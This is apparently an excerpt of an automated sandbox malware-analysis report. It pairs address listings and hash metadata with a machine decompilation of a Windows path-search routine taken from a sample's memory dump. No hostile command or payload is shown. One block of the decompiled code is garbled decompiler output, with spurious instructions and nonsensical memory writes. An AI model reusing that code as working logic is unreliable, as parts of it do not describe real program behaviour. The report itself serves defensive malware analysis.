                                                                                                                0x009f49c5
                                                                                                                0x009f49cc
                                                                                                                0x009f49d4
                                                                                                                0x009f49d7
                                                                                                                0x009f49da
                                                                                                                0x009f49e4
                                                                                                                0x009f49e5
                                                                                                                0x009f49f3
                                                                                                                0x009f4a02
                                                                                                                0x00000000
                                                                                                                0x009f4a02
                                                                                                                0x009f4972
                                                                                                                0x009f4974
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f4976
                                                                                                                0x009f4979
                                                                                                                0x009f4982
                                                                                                                0x009f4983
                                                                                                                0x009f4984
                                                                                                                0x009f498b
                                                                                                                0x009f498d
                                                                                                                0x009f4991
                                                                                                                0x009f4993
                                                                                                                0x009f4999
                                                                                                                0x009f499d
                                                                                                                0x009f49a2
                                                                                                                0x009f49a2
                                                                                                                0x009f49a2
                                                                                                                0x009f4999
                                                                                                                0x009f49ac
                                                                                                                0x00000000
                                                                                                                0x009f49b3
                                                                                                                0x009f48f8
                                                                                                                0x009f48fe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f48fe
                                                                                                                0x009f4895
                                                                                                                0x009f489c
                                                                                                                0x009f48ad
                                                                                                                0x009f48b2
                                                                                                                0x009f48b5
                                                                                                                0x009f48b7
                                                                                                                0x009f48ba
                                                                                                                0x009f48bc
                                                                                                                0x009f48c6
                                                                                                                0x009f48c6
                                                                                                                0x009f48cb
                                                                                                                0x009f48d1
                                                                                                                0x009f48d4
                                                                                                                0x009f48d8
                                                                                                                0x009f48d8
                                                                                                                0x00000000
                                                                                                                0x009f48d8
                                                                                                                0x009f48be
                                                                                                                0x009f48c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f48c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f48c4
                                                                                                                0x00000000
                                                                                                                0x009f4882
                                                                                                                0x009f487b
                                                                                                                0x009f4904
                                                                                                                0x009f4906
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f4908
                                                                                                                0x009f490e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f4910
                                                                                                                0x009f4917
                                                                                                                0x009f4917
                                                                                                                0x00000000
                                                                                                                0x009f4917
                                                                                                                0x0099b1ba
                                                                                                                0x009f47f9
                                                                                                                0x009f47fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f47fc
                                                                                                                0x0099b1c0
                                                                                                                0x0099b1c0
                                                                                                                0x0099b1c3
                                                                                                                0x0099b1cb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _vswprintf_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 677850445-0
                                                                                                                • Opcode ID: 8241bd77c3c2675f93203134d4dd1702a93bd10d15cc36c2666c900f172c8374
                                                                                                                • Instruction ID: 505e39b983303fb54878b9b361adf43e2f6030d3cc62d7c625937eaa79545392
                                                                                                                • Opcode Fuzzy Hash: 8241bd77c3c2675f93203134d4dd1702a93bd10d15cc36c2666c900f172c8374
                                                                                                                • Instruction Fuzzy Hash: 4351DF71E0025D8BDF31CF68C845BBFBBB4AF40710F2081ADEA59AB282D7744D818B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E009C2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t245;
				signed int _t249;
				void* _t250;
				signed int _t251;
				signed int _t258;
				signed int _t260;
				intOrPtr _t262;
				signed int _t265;
				signed int _t272;
				signed int _t275;
				signed int _t283;
				intOrPtr _t289;
				signed int _t291;
				signed int _t293;
				void* _t294;
				signed int _t295;
				signed int _t296;
				unsigned int _t299;
				signed int _t303;
				void* _t304;
				signed int _t305;
				signed int _t309;
				intOrPtr _t322;
				signed int _t331;
				signed int _t333;
				signed int _t334;
				signed int _t338;
				signed int _t339;
				signed int _t341;
				signed int _t343;
				signed int _t346;
				void* _t347;

				_t343 = _t346;
				_t347 = _t346 - 0x4c;
				_v8 =  *0xa8d360 ^ _t343;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t338 = 0xa8b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t299 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t289 = 0x48;
				_t319 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t331 = 0;
				_v37 = _t319;
				if(_v48 <= 0) {
					L16:
					_t45 = _t289 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t339 = 0xc0000106;
						goto L32;
					} else {
						_t338 = L009B4620(_t299,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t289);
						_v52 = _t338;
						__eflags = _t338;
						if(_t338 == 0) {
							_t339 = 0xc0000017;
							goto L32;
						} else {
							 *(_t338 + 0x44) =  *(_t338 + 0x44) & 0x00000000;
							_t50 = _t338 + 0x48; // 0x48
							_t333 = _t50;
							_t319 = _v32;
							 *((intOrPtr*)(_t338 + 0x3c)) = _t289;
							_t291 = 0;
							 *((short*)(_t338 + 0x30)) = _v48;
							__eflags = _t319;
							if(_t319 != 0) {
								 *(_t338 + 0x18) = _t333;
								__eflags = _t319 - 0xa88478;
								 *_t338 = ((0 | _t319 == 0x00a88478) - 0x00000001 & 0xfffffffb) + 7;
								E009DF3E0(_t333,  *((intOrPtr*)(_t319 + 4)),  *_t319 & 0x0000ffff);
								_t319 = _v32;
								_t347 = _t347 + 0xc;
								_t291 = 1;
								__eflags = _a8;
								_t333 = _t333 + (( *_t319 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t283 = E00A239F2(_t333);
									_t319 = _v32;
									_t333 = _t283;
								}
							}
							_t303 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t339 = _v68;
								__eflags = 0;
								 *((short*)(_t333 - 2)) = 0;
								goto L32;
							} else {
								_t293 = _t338 + _t291 * 4;
								_v56 = _t293;
								do {
									__eflags = _t319;
									if(_t319 != 0) {
										_t245 =  *(_v60 + _t303 * 4);
										__eflags = _t245;
										if(_t245 == 0) {
											goto L30;
										} else {
											__eflags = _t245 == 5;
											if(_t245 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t293 =  *(_v60 + _t303 * 4);
										 *(_t293 + 0x18) = _t333;
										_t249 =  *(_v60 + _t303 * 4);
										__eflags = _t249 - 8;
										if(_t249 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t249 * 4 +  &M009C2959))) {
												case 0:
													__ax =  *0xa88488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E009DF3E0(__edi,  *0xa8848c, __ax & 0x0000ffff);
														__eax =  *0xa88488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E009DF3E0(_t333, _v80, _v64);
													_t278 = _v64;
													goto L26;
												case 2:
													 *0xa88480 & 0x0000ffff = E009DF3E0(__edi,  *0xa88484,  *0xa88480 & 0x0000ffff);
													__eax =  *0xa88480 & 0x0000ffff;
													__eax = ( *0xa88480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E009DF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E009DF3E0(_t333, _v76, _v36);
														_t278 = _v36;
													}
													L26:
													_t347 = _t347 + 0xc;
													_t333 = _t333 + (_t278 >> 1) * 2 + 2;
													__eflags = _t333;
													L27:
													_push(0x3b);
													_pop(_t280);
													 *((short*)(_t333 - 2)) = _t280;
													goto L28;
												case 6:
													__ebx =  *0xa8575c;
													__eflags = __ebx - 0xa8575c;
													if(__ebx != 0xa8575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E009DF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xa8575c;
														} while (__ebx != 0xa8575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xa88478 & 0x0000ffff = E009DF3E0(__edi,  *0xa8847c,  *0xa88478 & 0x0000ffff);
													__eax =  *0xa88478 & 0x0000ffff;
													__eax = ( *0xa88478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00A239F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xa86e58 & 0x0000ffff = E009DF3E0(__edi,  *0xa86e5c,  *0xa86e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xa86e58 & 0x0000ffff;
													__eax = ( *0xa86e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t303 = _v16;
													_t319 = _v32;
													L29:
													_t293 = _t293 + 4;
													__eflags = _t293;
													_v56 = _t293;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t303 = _t303 + 1;
									_v16 = _t303;
									__eflags = _t303 - _v48;
								} while (_t303 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t249 =  *(_v60 + _t331 * 4);
						if(_t249 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t249 * 4 +  &M009C2935))) {
							case 0:
								__ax =  *0xa88488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t319 =  &_v64;
								_v80 = E009C2E3E(0,  &_v64);
								_t289 = _t289 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xa88480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xa88480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E009AEEF0(0xa879a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E009AEB70(__ecx, 0xa879a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t223 = _v72;
											__eflags = _t223;
											if(_t223 != 0) {
												L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t223);
											}
											_t224 = _v52;
											__eflags = _t224;
											if(_t224 != 0) {
												__eflags = _t339;
												if(_t339 < 0) {
													L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t224);
													_t224 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t299 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xa87b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L009B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E009AEB70(__ecx, 0xa879a0);
										__eax = _v52;
										L36:
										_pop(_t332);
										_pop(_t340);
										__eflags = _v8 ^ _t343;
										_pop(_t290);
										return E009DB640(_t224, _t290, _v8 ^ _t343, _t319, _t332, _t340);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t285 = _v56;
								if(_v56 != 0) {
									_t319 =  &_v36;
									_t287 = E009C2E3E(_t285,  &_v36);
									_t299 = _v36;
									_v76 = _t287;
								}
								if(_t299 == 0) {
									goto L44;
								} else {
									_t289 = _t289 + 2 + _t299;
								}
								goto L14;
							case 6:
								__eax =  *0xa85764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xa88478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xa88478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xa86e58 & 0x0000ffff;
								__eax = ( *0xa86e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t331 = _t331 + 1;
								if(_t331 >= _v48) {
									goto L16;
								} else {
									_t319 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t304 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("pushfd");
					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t249;
					asm("pushfd");
					_t250 = _t249 + _t249;
					asm("daa");
					asm("pushfd");
					 *_t338 =  *_t338 + _t304;
					asm("pushfd");
					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t250;
					asm("pushfd");
					 *0x1f009c26 =  *0x1f009c26 + _t250;
					_pop(_t294);
					_t251 =  *0x9c289400;
					 *0x200a05b =  *0x200a05b + _t319;
					 *((intOrPtr*)(_t251 + _t251 + 0x9c2880)) =  *((intOrPtr*)(_t251 + _t251 + 0x9c2880)) - _t294;
					_t252 = _t251 *  *_t333;
					asm("pushfd");
					 *_t338 =  *_t338 + _t294;
					 *((intOrPtr*)(_t252 + _t252 + 0x9c284e)) =  *((intOrPtr*)(_t251 *  *_t333 + _t251 *  *_t333 + 0x9c284e)) - _t294;
					asm("daa");
					asm("pushfd");
					_pop(_t295);
					 *((intOrPtr*)(_t347 + _t295 * 2)) =  *((intOrPtr*)(_t347 + _t295 * 2)) + (_t251 *  *_t333 >> 0x20);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xa6ff00);
					E009ED08C(_t295, _t333, _t338);
					_v44 =  *[fs:0x18];
					_t334 = 0;
					 *_a24 = 0;
					_t296 = _a12;
					__eflags = _t296;
					if(_t296 == 0) {
						_t258 = 0xc0000100;
					} else {
						_v8 = 0;
						_t341 = 0xc0000100;
						_v52 = 0xc0000100;
						_t260 = 4;
						while(1) {
							_v40 = _t260;
							__eflags = _t260;
							if(_t260 == 0) {
								break;
							}
							_t309 = _t260 * 0xc;
							_v48 = _t309;
							__eflags = _t296 -  *((intOrPtr*)(_t309 + 0x971664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t275 = E009DE5C0(_a8,  *((intOrPtr*)(_t309 + 0x971668)), _t296);
									_t347 = _t347 + 0xc;
									__eflags = _t275;
									if(__eflags == 0) {
										_t341 = E00A151BE(_t296,  *((intOrPtr*)(_v48 + 0x97166c)), _a16, _t334, _t341, __eflags, _a20, _a24);
										_v52 = _t341;
										break;
									} else {
										_t260 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t260 = _t260 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t341;
						__eflags = _t341;
						if(_t341 < 0) {
							__eflags = _t341 - 0xc0000100;
							if(_t341 == 0xc0000100) {
								_t305 = _a4;
								__eflags = _t305;
								if(_t305 != 0) {
									_v36 = _t305;
									__eflags =  *_t305 - _t334;
									if( *_t305 == _t334) {
										_t341 = 0xc0000100;
										goto L76;
									} else {
										_t322 =  *((intOrPtr*)(_v44 + 0x30));
										_t262 =  *((intOrPtr*)(_t322 + 0x10));
										__eflags =  *((intOrPtr*)(_t262 + 0x48)) - _t305;
										if( *((intOrPtr*)(_t262 + 0x48)) == _t305) {
											__eflags =  *(_t322 + 0x1c);
											if( *(_t322 + 0x1c) == 0) {
												L106:
												_t341 = E009C2AE4( &_v36, _a8, _t296, _a16, _a20, _a24);
												_v32 = _t341;
												__eflags = _t341 - 0xc0000100;
												if(_t341 != 0xc0000100) {
													goto L69;
												} else {
													_t334 = 1;
													_t305 = _v36;
													goto L75;
												}
											} else {
												_t265 = E009A6600( *(_t322 + 0x1c));
												__eflags = _t265;
												if(_t265 != 0) {
													goto L106;
												} else {
													_t305 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t341 = E009C2C50(_t305, _a8, _t296, _a16, _a20, _a24, _t334);
											L76:
											_v32 = _t341;
											goto L69;
										}
									}
									goto L108;
								} else {
									E009AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t341 = _a24;
									_t272 = E009C2AE4( &_v36, _a8, _t296, _a16, _a20, _t341);
									_v32 = _t272;
									__eflags = _t272 - 0xc0000100;
									if(_t272 == 0xc0000100) {
										_v32 = E009C2C50(_v36, _a8, _t296, _a16, _a20, _t341, 1);
									}
									_v8 = _t334;
									E009C2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t258 = _t341;
					}
					L70:
					return E009ED0D1(_t258);
				}
				L108:
			}





















































                                                                                                                0x009c2584
                                                                                                                0x009c2586
                                                                                                                0x009c2590
                                                                                                                0x009c2596
                                                                                                                0x009c2597
                                                                                                                0x009c2598
                                                                                                                0x009c2599
                                                                                                                0x009c259e
                                                                                                                0x009c25a4
                                                                                                                0x009c25a9
                                                                                                                0x009c25ac
                                                                                                                0x009c25ae
                                                                                                                0x009c25b1
                                                                                                                0x009c25b2
                                                                                                                0x009c25b5
                                                                                                                0x009c25b8
                                                                                                                0x009c25bb
                                                                                                                0x009c25bc
                                                                                                                0x009c25bf
                                                                                                                0x009c25c2
                                                                                                                0x009c25c5
                                                                                                                0x009c25c6
                                                                                                                0x009c25cb
                                                                                                                0x009c25ce
                                                                                                                0x009c25d8
                                                                                                                0x009c25dd
                                                                                                                0x009c25de
                                                                                                                0x009c25e1
                                                                                                                0x009c25e3
                                                                                                                0x009c25e9
                                                                                                                0x009c26da
                                                                                                                0x009c26da
                                                                                                                0x009c26dd
                                                                                                                0x009c26e2
                                                                                                                0x00a05b56
                                                                                                                0x00000000
                                                                                                                0x009c26e8
                                                                                                                0x009c26f9
                                                                                                                0x009c26fb
                                                                                                                0x009c26fe
                                                                                                                0x009c2700
                                                                                                                0x00a05b60
                                                                                                                0x00000000
                                                                                                                0x009c2706
                                                                                                                0x009c2706
                                                                                                                0x009c270a
                                                                                                                0x009c270a
                                                                                                                0x009c270d
                                                                                                                0x009c2713
                                                                                                                0x009c2716
                                                                                                                0x009c2718
                                                                                                                0x009c271c
                                                                                                                0x009c271e
                                                                                                                0x00a05b6c
                                                                                                                0x00a05b6f
                                                                                                                0x00a05b7f
                                                                                                                0x00a05b89
                                                                                                                0x00a05b8e
                                                                                                                0x00a05b93
                                                                                                                0x00a05b96
                                                                                                                0x00a05b9c
                                                                                                                0x00a05ba0
                                                                                                                0x00a05ba3
                                                                                                                0x00a05bab
                                                                                                                0x00a05bb0
                                                                                                                0x00a05bb3
                                                                                                                0x00a05bb3
                                                                                                                0x00a05ba3
                                                                                                                0x009c2724
                                                                                                                0x009c2726
                                                                                                                0x009c2729
                                                                                                                0x009c272c
                                                                                                                0x009c279d
                                                                                                                0x009c279d
                                                                                                                0x009c27a0
                                                                                                                0x009c27a2
                                                                                                                0x00000000
                                                                                                                0x009c272e
                                                                                                                0x009c272e
                                                                                                                0x009c2731
                                                                                                                0x009c2734
                                                                                                                0x009c2734
                                                                                                                0x009c2736
                                                                                                                0x00a05bc1
                                                                                                                0x00a05bc1
                                                                                                                0x00a05bc4
                                                                                                                0x00000000
                                                                                                                0x00a05bca
                                                                                                                0x00a05bca
                                                                                                                0x00a05bcd
                                                                                                                0x00000000
                                                                                                                0x00a05bd3
                                                                                                                0x00000000
                                                                                                                0x00a05bd3
                                                                                                                0x00a05bcd
                                                                                                                0x009c273c
                                                                                                                0x009c273c
                                                                                                                0x009c2742
                                                                                                                0x009c2747
                                                                                                                0x009c274a
                                                                                                                0x009c274d
                                                                                                                0x009c2750
                                                                                                                0x00000000
                                                                                                                0x009c2756
                                                                                                                0x009c2756
                                                                                                                0x00000000
                                                                                                                0x009c2902
                                                                                                                0x009c2908
                                                                                                                0x009c290b
                                                                                                                0x00000000
                                                                                                                0x009c2911
                                                                                                                0x009c291c
                                                                                                                0x009c2921
                                                                                                                0x00000000
                                                                                                                0x009c2921
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c2880
                                                                                                                0x009c2887
                                                                                                                0x009c288c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c2805
                                                                                                                0x009c280a
                                                                                                                0x009c2814
                                                                                                                0x009c2816
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c281e
                                                                                                                0x009c2821
                                                                                                                0x009c2823
                                                                                                                0x00000000
                                                                                                                0x009c2829
                                                                                                                0x009c2829
                                                                                                                0x009c2831
                                                                                                                0x009c283c
                                                                                                                0x009c283e
                                                                                                                0x00000000
                                                                                                                0x009c283e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c284e
                                                                                                                0x009c2850
                                                                                                                0x009c2851
                                                                                                                0x009c2854
                                                                                                                0x009c2857
                                                                                                                0x009c285a
                                                                                                                0x009c285c
                                                                                                                0x009c285d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c275d
                                                                                                                0x009c2761
                                                                                                                0x00000000
                                                                                                                0x009c2767
                                                                                                                0x009c276e
                                                                                                                0x009c2773
                                                                                                                0x009c2773
                                                                                                                0x009c2776
                                                                                                                0x009c2778
                                                                                                                0x009c277e
                                                                                                                0x009c277e
                                                                                                                0x009c2781
                                                                                                                0x009c2781
                                                                                                                0x009c2783
                                                                                                                0x009c2784
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a05bd8
                                                                                                                0x00a05bde
                                                                                                                0x00a05be4
                                                                                                                0x00a05be6
                                                                                                                0x00a05be8
                                                                                                                0x00a05be9
                                                                                                                0x00a05bee
                                                                                                                0x00a05bf8
                                                                                                                0x00a05bff
                                                                                                                0x00a05c01
                                                                                                                0x00a05c04
                                                                                                                0x00a05c07
                                                                                                                0x00a05c0b
                                                                                                                0x00a05c0d
                                                                                                                0x00a05c0d
                                                                                                                0x00a05c15
                                                                                                                0x00a05c18
                                                                                                                0x00a05c1b
                                                                                                                0x00a05c1b
                                                                                                                0x00a05c1e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c28c3
                                                                                                                0x009c28c8
                                                                                                                0x009c28d2
                                                                                                                0x009c28d4
                                                                                                                0x009c28d8
                                                                                                                0x009c28db
                                                                                                                0x00a05c26
                                                                                                                0x00a05c28
                                                                                                                0x00a05c2d
                                                                                                                0x00a05c2d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a05c34
                                                                                                                0x00a05c36
                                                                                                                0x00a05c49
                                                                                                                0x00a05c4e
                                                                                                                0x00a05c54
                                                                                                                0x00a05c5b
                                                                                                                0x00a05c5d
                                                                                                                0x00a05c60
                                                                                                                0x009c2788
                                                                                                                0x009c2788
                                                                                                                0x009c278b
                                                                                                                0x009c278e
                                                                                                                0x009c278e
                                                                                                                0x009c278e
                                                                                                                0x009c2791
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c2756
                                                                                                                0x009c2750
                                                                                                                0x00000000
                                                                                                                0x009c2794
                                                                                                                0x009c2794
                                                                                                                0x009c2795
                                                                                                                0x009c2798
                                                                                                                0x009c2798
                                                                                                                0x00000000
                                                                                                                0x009c2734
                                                                                                                0x009c272c
                                                                                                                0x009c2700
                                                                                                                0x009c25ef
                                                                                                                0x009c25ef
                                                                                                                0x009c25ef
                                                                                                                0x009c25f2
                                                                                                                0x009c25f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c25fe
                                                                                                                0x00000000
                                                                                                                0x009c28e6
                                                                                                                0x009c28ec
                                                                                                                0x009c28ef
                                                                                                                0x009c28f5
                                                                                                                0x009c28f8
                                                                                                                0x009c28f8
                                                                                                                0x00000000
                                                                                                                0x009c28f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c2866
                                                                                                                0x009c2866
                                                                                                                0x009c2876
                                                                                                                0x009c2879
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c27e0
                                                                                                                0x009c27e7
                                                                                                                0x009c27e9
                                                                                                                0x009c27eb
                                                                                                                0x00a05afd
                                                                                                                0x00000000
                                                                                                                0x00a05afd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c2633
                                                                                                                0x009c2638
                                                                                                                0x009c263b
                                                                                                                0x009c263c
                                                                                                                0x009c263e
                                                                                                                0x009c2640
                                                                                                                0x009c2642
                                                                                                                0x009c2647
                                                                                                                0x009c2649
                                                                                                                0x009c264e
                                                                                                                0x009c2650
                                                                                                                0x009c2653
                                                                                                                0x009c2659
                                                                                                                0x009c26a2
                                                                                                                0x009c26a7
                                                                                                                0x009c26ac
                                                                                                                0x009c26b2
                                                                                                                0x00a05b11
                                                                                                                0x00a05b15
                                                                                                                0x00a05b17
                                                                                                                0x00000000
                                                                                                                0x009c26b8
                                                                                                                0x009c26b8
                                                                                                                0x009c26ba
                                                                                                                0x009c27a6
                                                                                                                0x009c27a6
                                                                                                                0x009c27a9
                                                                                                                0x009c27ab
                                                                                                                0x009c27b9
                                                                                                                0x009c27b9
                                                                                                                0x009c27be
                                                                                                                0x009c27c1
                                                                                                                0x009c27c3
                                                                                                                0x009c27c5
                                                                                                                0x009c27c7
                                                                                                                0x00a05c74
                                                                                                                0x00a05c79
                                                                                                                0x00a05c79
                                                                                                                0x009c27c7
                                                                                                                0x00000000
                                                                                                                0x009c26c0
                                                                                                                0x009c26c0
                                                                                                                0x009c26c3
                                                                                                                0x009c26c6
                                                                                                                0x009c26c6
                                                                                                                0x009c26c9
                                                                                                                0x009c26c9
                                                                                                                0x00000000
                                                                                                                0x009c26c9
                                                                                                                0x009c26ba
                                                                                                                0x009c265b
                                                                                                                0x009c265b
                                                                                                                0x009c265e
                                                                                                                0x009c2667
                                                                                                                0x009c266d
                                                                                                                0x009c2677
                                                                                                                0x009c267c
                                                                                                                0x009c267f
                                                                                                                0x009c2681
                                                                                                                0x00a05b49
                                                                                                                0x00a05b4e
                                                                                                                0x009c27cd
                                                                                                                0x009c27d0
                                                                                                                0x009c27d1
                                                                                                                0x009c27d2
                                                                                                                0x009c27d4
                                                                                                                0x009c27dd
                                                                                                                0x009c2687
                                                                                                                0x009c2687
                                                                                                                0x009c268a
                                                                                                                0x009c268b
                                                                                                                0x009c268e
                                                                                                                0x009c268f
                                                                                                                0x009c2691
                                                                                                                0x009c2696
                                                                                                                0x009c2698
                                                                                                                0x009c269d
                                                                                                                0x009c269f
                                                                                                                0x00000000
                                                                                                                0x009c269f
                                                                                                                0x009c2681
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c2846
                                                                                                                0x00000000
